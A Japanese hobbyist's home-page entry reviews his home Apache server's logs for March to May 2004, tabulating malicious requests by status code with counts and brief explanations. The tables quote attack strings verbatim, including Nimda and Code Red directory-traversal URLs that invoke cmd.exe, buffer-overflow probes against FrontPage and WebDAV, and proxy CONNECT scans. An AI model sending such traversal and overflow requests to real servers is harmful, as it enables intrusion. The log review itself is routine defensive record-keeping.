楽しみながら攻めつづける!
−HONDA '88NSR250R & '94NSR250R SE−

[検索方法]
 
山下の部屋 自宅サーバのログを見てみよう
お薦めコンテンツ 楽しみながら攻めつづける!
Apacheのログウォッチ 2004年3月15日〜2004年5月31日
 
 自宅Webサーバのログ集計です。今回は3月中旬〜5月末の2.5ヶ月分です。
しかし、毎月・毎月古いものがなくなる訳でもなく…不正アクセスログが残ってますね〜。ちょっと飽きてきました(汗)
特に、414: Request URI Too LongのWebDAVの脆弱性を狙った攻撃なんて2672回のアタックだし。
 
 Apacheのアクセスログから見飽きた不正アクセスは隔離して別ファイルにログを取るように設定してみるかな?作成したホームページでリンク切れなどの不具合がないかをチェックしたいけど、あまりにも不正ログの方が多すぎてうんざりだし…。
 
400:Bad Request
Method URL Query 回数 理由
GET /NULL.IDA CCC〜(略)〜\xc8Qcmd.exe$ 137 WINNTAutoAttack V2.5というアタックツールからの攻撃らしい
GET /scripts/..%%35%63../winnt/system32/cmd.exe /c+dir 1 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%%35c./winnt/system32/cmd.exe /c+dir 1 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
POST /_vti_bin/_vti_aut/fp30reg.dll - 1 FrontPageのデバッグコンポーネントでバッファオーバーランの脆弱性を狙った攻撃
GET /cgi-bin/namazu.cgi key=sgv&lang 1
GET /cgi-bin/namazu.cgi submit=%8c%9f%8d%f5&lang 1
 
404:Not Found
Method URL Query 回数 理由
GET /_vti_bin/owssvr.dll UL=1&〜(略)〜&CAPREQ=0 117 IE+MS Office環境でWebディスカッション機能がOnだと、リクエストを出すらしい
GET /MSOffice/cltreq.asp UL=1&〜(略)〜&CAPREQ=0 117 IE+MS Office環境でWebディスカッション機能がOnだと、リクエストを出すらしい
GET /default.ida XXXX〜(途中略)〜%u00=a 70 「CodeRed」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /column/ディレクトリなど - 21 コラムはネタが無いので、サーバ上から削除したんですよ(汗)
GET /honpo/midi/smf3.mid - 20 ??
GET /scripts/nsiislog.dll - 9 Windows Mediaサービスに対する ISAPI 拡張欠陥による IIS サービス拒否攻撃
GET /seed/関連? - 9 ???
GET /NULL.printer - 7 WINNTAutoAttack V2.5というアタックツールからの攻撃らしい
GET /_vti_inf.html - 5 WebDAV+Office XPで「Webフォルダとして開く」にチェックがしてあり、自宅サーバにMS-Author-ViaというヘッダーがないのでFrontPage Server Extensionだと勘違いして要求してくるらしい。
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+dir 4 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+dir 4 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
POST /_vti_bin/shtml.exe/_vti_rpc - 4 WebDAV+Office XPで「Webフォルダとして開く」にチェックがしてあり、自宅サーバにMS-Author-ViaというヘッダーがないのでFrontPage Server Extensionだと勘違いして要求してくるらしい。
GET /c/winnt/system32/cmd.exe /c+dir 4 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /d/winnt/system32/cmd.exe /c+dir 4 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe /c+dir 4 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /MSADC/root.exe /c+dir 4 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%25%35%63../winnt/system32/cmd.exe /c+dir 4 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%252f../winnt/system32/cmd.exe /c+dir 4 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 4 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c0%2f../winnt/system32/cmd.exe /c+dir 4 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 4 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 4 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir 4 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/root.exe /c+dir 4 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET http://dc.tickerbar.net:42857/tld/pxy.m nc=19294361 4
POST /formmail.php - 1 メール送信PHPファイル狙い?
POST /robotsxx.txt - 1 検索ロボットからのアクセスかな?
GET http://dc.tickerbar.net/tld/pxy.m nc=746562884 1
 
405:Method Not Allowed
Method URL Query 回数 理由
POST / - 1 POST?
CONNECT 1.3.3.7:1337 - 4 1337番ポート?新手の広域スキャンかな??
CONNECT 66.94.230.44:80 - 1 80番ポート?
 
414: Request URI Too Long
Method URL Query 回数 理由
SEARCH /\x90〜(略)〜\x90 - 2672 WebDAV の脆弱性を狙った攻撃らしい
 
501:Not Implemented
Method URL Query 回数 理由
get /scripts/..%c0%af..〜略〜/system32/cmd.exe /c%20dir 4 IIS狙いか?
SEARCH / - 2
 
 
BACK TOP PAGE